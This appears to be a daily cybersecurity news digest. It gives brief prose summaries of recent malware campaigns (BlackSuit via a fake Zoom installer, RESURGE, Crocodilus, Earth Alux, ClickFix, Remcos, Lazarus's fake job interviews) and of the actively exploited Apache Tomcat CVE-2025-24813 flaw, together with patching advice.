A deceptive Zoom installer was the entry point for a carefully executed ransomware attack involving BlackSuit. Attackers spent nine days inside the network. The full operation spanned more than 190 hours, combining stealth, staging, and social engineering.

The CISA has released an analysis of a new malware named RESURGE, which targets a known vulnerability in Ivanti Connect Secure appliances. RESURGE operates like a rootkit, allowing attackers to create web shells, steal credentials, and establish persistence through SSH tunnels. The malware enables unauthenticated remote code execution and has been added to KEV catalog.

A new Android banking trojan called Crocodilus is using fake alerts to trick users into handing over their crypto wallet seed phrases. Disguised as a warning about backing up recovery keys, the malware uses social engineering to gain full access to wallets. The threat has so far targeted users in Turkey and Spain.

Top Malware Reported in the Last 24 Hours

Earth Alux hits critical industries

A cyberespionage campaign by the China-linked Earth Alux APT group involved a primary backdoor called VARGEIT. The backdoor has the ability to load tools directly from its C2 server to a spawned process of mspaint. VARGEIT is used as a first, second, and/or later-stage backdoor, while COBEACON is employed as a first-stage backdoor. The threat group primarily targeted the Asia Pacific and Latin American regions, hitting critical industries including government, technology, logistics, manufacturing, telecommunications, IT services, and retail.

ClickFix Captcha leveraged for malware delivery

Cybercriminals are using fake CAPTCHA pages called ClickFix to spread malware like info-stealers, ransomware, and the Qakbot banking trojan. They trick users into running harmful commands by redirecting them to a fake CAPTCHA site. This involves pressing Windows Key + R, pasting a command, and executing it. This action downloads malware from attacker-controlled domains. Even with some domains being taken down, the method remains effective due to the use of social engineering.

Bogus Zoom launches BlackSuit ransomware

In a well-planned cyberattack, hackers used a bogus Zoom download to enter a corporate network, spending nine days before launching the BlackSuit ransomware. In this case, the attackers combined stealth and social engineering for maximum impact. On the ninth day, the intruders used tools like Brute Ratel and Cobalt Strike for reconnaissance and credential dumping. They exfiltrated nearly 1GB of data and executed the ransomware across the network, deleting shadow copies and leaving a ransom note. The entire process took over 194 hours.

Gamaredon campaign distributes Remcos RAT

A phishing campaign is targeting entities in Ukraine to spread a remote access trojan called Remcos RAT. The campaign sends ZIP files containing Windows shortcut files disguised as Microsoft Office documents related to the Russo-Ukrainian war and military actions via phishing emails. It infects victims with a PowerShell downloader that connects to servers in Russia and Germany to download a ZIP file with the Remcos backdoor. Researchers linked this activity to a Russian hacking group called Gamaredon, which has been active since 2013 and is connected to the Russian Federal Security Service. 

Crocodilus malware hits Turkey and Spain

A new Android malware called Crocodilus tricks users into giving their cryptocurrency wallet seed phrase by warning them to back up their key to avoid losing access. This banking trojan can take over devices, steal data, and allow remote control. Researchers found it spreads through a dropper that bypasses Android's security. Crocodilus uses social engineering through a fake warning to guide victims to their seed phrase, enabling attackers to control and drain wallets. Initially targeting users in Turkey and Spain, it may expand soon.

Top Vulnerabilities Reported in the Last 24 Hours

Critical Apache Tomcat flaw patched

A critical RCE vulnerability, CVE-2025-24813, is being actively exploited in Apache Tomcat servers. This allows file uploads via unauthenticated HTTP PUT requests, resulting in code execution. Affected versions include 9.0.0-M1 to 9.0.98, 10.1.0-M1 to 10.1.34, and 11.0.0-M1 to 11.0.2. Exploitation has occurred rapidly in Latvia, Italy, the U.S., and China, with most attacks targeting U.S. systems. Patched versions are available. Organizations should upgrade, disable partial PUT support, and monitor logs for suspicious activity.

CISA warns of RESURGE malware

The CISA released a Malware Analysis Report on a new malware, dubbed RESURGE, that targets CVE-2025-0282 in Ivanti Connect Secure appliances. RESURGE supports SPAWNCHIMERA but uses unique commands that change its behavior. The malware creates web shells, bypasses checks, and enables credential theft and unauthorized account creation. In January, the CISA added CVE-2025-0282 to its KEV catalog. When exploited, it allows remote code execution for unauthenticated attackers. The agency reports that RESURGE acts as a rootkit and creates secure tunnels for attackers via SSH. 

Top Scams Reported in the Last 24 Hours

Lazarus abuses the ClickFix scheme

Lazarus has been targeting the cryptocurrency industry since 2017 to fund North Korea. It uses various tools and malware, adapting quickly to avoid detection. A recent probe uncovered a campaign named ClickFake Interview, which uses real job interview websites to install backdoors on Windows and macOS. On Windows, a VBS script executes the GolangGhost backdoor via NodeJS. On macOS, a Bash script performs similar tasks, stealing system passwords before launching GolangGhost for data theft. Analysts believe this campaign continues the Contagious Interview trend from November 2023, focusing on centralized finance instead of decentralized finance (DeFi). The fake job offers aim to attract non-technical cryptocurrency employees, likely to evade detection.